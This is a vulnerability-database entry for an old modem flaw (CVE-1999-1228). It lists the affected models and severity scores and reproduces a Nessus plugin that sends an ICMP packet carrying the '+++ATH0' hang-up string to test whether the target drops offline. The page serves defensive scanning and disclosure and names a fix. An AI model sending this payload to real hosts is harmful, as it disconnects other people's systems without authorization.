Vulnerabilities > CVE-1999-1228

CVSS 7.5 - HIGH

Attack vector

NETWORK

Attack complexity

LOW

Privileges required

NONE

Confidentiality impact

PARTIAL

Integrity impact

PARTIAL

Availability impact

PARTIAL

network

low complexity

logicode

diamond

us-robotics

nessus

NVD

Published: 1998-09-27

Updated: 2017-12-19

Summary

Various modems that do not implement a guard time, or are configured with a guard time of 0, can allow remote attackers to execute arbitrary modem commands such as ATH, ATH0, etc., via a "+++" sequence that appears in ICMP packets, the subject of an e-mail message, IRC commands, and others.

Vulnerable Configurations

Part	Description	Count
Application	Logicode Logicode Quicktel 28.8	1
Hardware	Diamond Diamond Supra 33.6 Diamond Supra V.90	2
Hardware	Us_Robotics US Robotics US Robotics 33.6	1

Nessus

NASL family	Denial of Service
NASL id	ATH0_HANGUP.NASL
description	It was possible to disconnect the remote host by sending it an specially crafted ICMP echo request packet. It is also possible to make the remote modem hang up and dial any phone number.
last seen	2020-06-01
modified	2020-06-02
plugin id	10020
published	1999-07-29
reporter	This script is Copyright (C) 1999-2019 Tenable Network Security, Inc.
source	https://www.tenable.com/plugins/nessus/10020
title	+ + + ATH0 Modem Hang Up String Remote DoS
code	# # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(10020); script_version("1.31"); script_cvs_date("Date: 2019/03/06 18:38:55"); script_cve_id("CVE-1999-1228"); script_name(english:"+ + + ATH0 Modem Hang Up String Remote DoS"); script_summary(english:"Makes a modem hang up"); script_set_attribute(attribute:"synopsis", value: "The remote modem is affected by a remote command execution vulnerability."); script_set_attribute(attribute:"description", value: "It was possible to disconnect the remote host by sending it an specially crafted ICMP echo request packet. It is also possible to make the remote modem hang up and dial any phone number."); script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1998/Sep/192"); script_set_attribute(attribute:"solution", value:"Add 'ATS2=255' in your modem init string."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploited_by_malware", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"1999/06/21"); script_set_attribute(attribute:"plugin_publication_date", value:"1999/07/29"); script_set_attribute(attribute:"potential_vulnerability", value:"true"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); script_category(ACT_KILL_HOST); script_copyright(english:"This script is Copyright (C) 1999-2019 Tenable Network Security, Inc."); script_family(english:"Denial of Service"); script_require_keys("Settings/ParanoidReport"); exit(0); } include("audit.inc"); include("global_settings.inc"); if (report_paranoia < 2) audit(AUDIT_PARANOID); if ( TARGET_IS_IPV6 ) exit(0); ip = forge_ip_packet(ip_hl:5, ip_v:4, ip_off:0, ip_id:9, ip_tos:0, ip_p : IPPROTO_ICMP, ip_len : 20, ip_src : compat::this_host(), ip_ttl : 255); data = string("+++ATH0\r\n"); icmp = forge_icmp_packet(ip:ip, icmp_type:8, icmp_code:0, icmp_seq : 2, icmp_id : 2, data:data); start_denial(); reply1 = send_packet(icmp, pcap_active:TRUE); alive = end_denial(); if(!alive){ security_hole(0); set_kb_item(name:"Host/dead", value:TRUE); }

Vulnerabilities > CVE-1999-1228 {"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Vulnerabilities","item":"https://cyber.vumetric.com/vulns/"},{"@type":"ListItem","position":2,"name":"CVE-1999-1228"}]}

Summary

Vulnerable Configurations

Nessus

References

Vulnerabilities > CVE-1999-1228